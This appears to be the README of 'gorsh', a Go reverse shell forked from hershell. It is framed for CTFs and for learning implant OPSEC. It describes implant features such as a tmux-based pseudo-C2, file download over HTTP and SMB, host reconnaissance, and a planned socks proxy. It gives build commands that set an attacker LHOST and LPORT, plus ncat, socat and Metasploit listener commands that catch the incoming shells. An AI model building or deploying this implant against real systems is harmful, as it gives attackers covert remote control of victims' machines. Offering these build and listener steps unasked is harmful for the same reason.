[go]lang [r]everse [sh]ell
Originally forked from - sysdream/hershell
Learn go.
Make a throwaway reverse shell for things like CTFs.
Learn about host-based OPSEC considerations when writing an implant.
Changes after fork:
- Uses tmux as a pseudo-C2-like interface, creating a new window with each agent callback
- Download files with HTTP on all platform
- Download files with SMB on all windows
- Situational Awareness output on new shells
- Removed Meterpreter functionality
- Removed Shellcode execution
- Remove the use of passing power/shell commands at the gorsh prompt
- Add common file operation commands that use go instead of power/shell
Roadmap:
- Potentially add reverse socks5 proxy functionality - Using Numbers11/rvprxmx
- Recon module for analyzing things like tasks, services, and host-based protections
- Dotnet integration so
shell
drops into a Runspace with System.Management.Automation. Bacially PowerShell without PowerShell.
Check out the official documentation for an intro to developing
with Go and setting up your Golang environment (with the $GOPATH
environment variable).
First, you'll need to generate your certs:
$ make depends
To simplify things, read the provided Makefile. You can set the following environment variables:
GOOS
: the target OSGOARCH
: the target architectureLHOST
: the attacker IP or domain nameLPORT
: the listener port
See possibleGOOS
andGOARCH
variables here.
For the make
targets, you only need theLHOST
andLPORT
environment variables.
Generate with:
$ make {windows,macos,linux}{32,64} LHOST=example.com LPORT=443
The local/start.sh
kicks off a tmux session and creates new windows on every new connection.
Feed it a port number to listen on and an &
to send it to the background, if you'd like.
cd local
./start.sh 443 &
# once a client connects
tmux attach -t GORSH
Shells can also be caught with:
- socat (not working on macos)
- ncat
- openssl server module
- metasploit multi handler (with a
python/shell_reverse_tcp_ssl
payload)
Examples
$ ncat --ssl --ssl-cert server.pem --ssl-key server.key -lvp 1234
$ socat stdio OPENSSL-LISTEN:443,cert=server.pem,key=server.key,verify=0
Once executed, you will be provided with the gorsh shell.
Type help
to show what commands are supported.
Initial Work - Ronan Kervella <r.kervella -at- sysdream -dot- com>
Modifications - f47h3r - @f47h3r_b0